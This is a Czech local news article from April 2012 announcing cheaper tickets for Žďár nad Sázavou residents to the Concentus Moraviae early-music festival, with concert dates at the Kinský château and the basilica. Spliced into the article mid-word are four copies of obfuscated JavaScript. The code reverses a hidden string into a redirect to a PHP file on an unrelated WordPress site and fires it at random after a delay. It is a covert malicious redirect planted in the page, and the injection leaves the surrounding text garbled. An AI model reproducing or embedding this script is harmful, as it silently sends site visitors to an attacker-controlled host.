Žďár nad Sázavou, zdar nad sazavou, aktuality, concentus, moraviae, festival
Rainbow page separator

Vstupenky na festival Concentus Moraviae výhodněji pro posluchače ze Žďáru nad Sázavou

Neděle, 8. dubna 2012

boreas-quartet-1-concentus-moraviae-2012-zdar-nad-sazavouŽďár nad Sázavou /17. ročník Mezinárodního hudebního festivalu 13 měst Concentus Moraviae proběhne mezi 2. a 30. červnem 2012 s podtitulem „Kouzlo čísel“. V dramaturgii Barbary Marii Willi zazní více než tři desítky koncertů hudby z období od středověku po baroko v podání českých a zahraničních hudebníků zabývajících se autentickou interpretací staré hudby. Festival bude vážně i hravě představovat nejdůležitější aspekty matematiky v hudbě a hledat jejich prostřednictvím znějící řád, který by uvedl duši posluchače do harmonie.

7. března 2012 byl zahájen předprodej vstupenek na koncerty festivalu Concentus Moraviae. Posluchači ze Žďáru nad Sázavou mají až do 2. června možnost zakoupit v předprodeji v pokladně kulturního domu vstupenky za zvýhodněnou cenu, sníženou o 50 Kč oproti ceně plné. S nákupem vstupenek neváhejte, kapacita sálů je omezená.

Festivalové koncerty ve Žďáře nad Sázavou se uskuteční v pondělí 11. června v 19:30 h v barokních sálech zámku Kinských u příleži["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tosti

405. výročí povýšení Žďáru na měs["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to a druhý  koncert proběhne ve středu 20. června v 19:30 h v bazilice Nanebevzetí Panny Marie a sv. Mikuláše.

Více informací na www.concentus-moraviae.cz